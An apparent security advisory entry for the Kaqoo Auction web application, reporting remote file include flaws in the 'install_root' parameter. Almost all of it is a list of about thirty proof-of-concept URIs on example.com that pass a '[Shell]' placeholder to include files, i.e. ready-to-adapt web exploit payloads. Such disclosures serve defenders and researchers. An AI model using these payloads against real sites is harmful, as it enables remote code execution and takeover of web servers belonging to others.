|
|
Kaqoo Auction Install_Root Multiple Remote File Include Vulnerabilities
Attackers can use a browser to exploit these issues. The following proof-of-concept URIs are available: http://www.example.com/include/core/support.inc.php?install_root=[Shell] http://www.example.com/include/core/function.inc.php?install_root=[Shell] http://www.example.com/include/core/rdal_object.inc.php?install_root=[Shell] http://www.example.com/include/core/rdal_editor.inc.php?install_root=[Shell] http://www.example.com/include/core/login.inc.php?install_root=[Shell] http://www.example.com/include/core/request.inc.php?install_root=[Shell] http://www.example.com/include/core/categories.inc.php?install_root=[Shell] http://www.example.com/include/display/item/save.inc.php?install_root=[Shell] http://www.example.com/include/display/item/preview.inc.php?install_root=[Shell] http://www.example.com/include/display/item/edit_item.inc.php?install_root=[Shell] http://www.example.com/include/display/item/new_item.inc.php?install_root=[Shell] http://www.example.com/include/display/item/item_info.inc.php?install_root=[Shell] http://www.example.com/include/display/search.inc.php?install_root=[Shell] http://www.example.com/include/display/item_edit.inc.php?install_root=[Shell] http://www.example.com/include/display/register_succsess.inc.php?install_root=[Shell] http://www.example.com/include/display/context_menu.inc.php?install_root=[Shell] http://www.example.com/include/display/item_repost.inc.php?install_root=[Shell] http://www.example.com/include/display/balance.inc.php?install_root=[Shell] http://www.example.com/include/display/featured.inc.php?install_root=[Shell] http://www.example.com/include/display/user.inc.php?install_root=[Shell] http://www.example.com/include/display/buynow.inc.php?install_root=[Shell] http://www.example.com/include/display/install_complete.inc.php?install_root=[Shell] http://www.example.com/include/display/fees_info.inc.php?install_root=[Shell] http://www.example.com/include/display/user_feedback.inc.php?install_root=[Shell] http://www.example.com/include/display/admin_balance.inc.php?install_root=[Shell] http://www.example.com/include/display/activate.inc.php?install_root=[Shell] http://www.example.com/include/display/user_info.inc.php?install_root=[Shell] http://www.example.com/include/display/member.inc.php?install_root=[Shell] http://www.example.com/include/display/add_bid.inc.php?install_root=[Shell] http://www.example.com/include/display/items_filter.inc.php?install_root=[Shell] http://www.example.com/include/display/my_info.inc.php?install_root=[Shell] http://www.example.com/include/display/register.inc.php?install_root=[Shell] http://www.example.com/include/display/leave_feedback.inc.php?install_root=[Shell] |
|
Privacy Statement |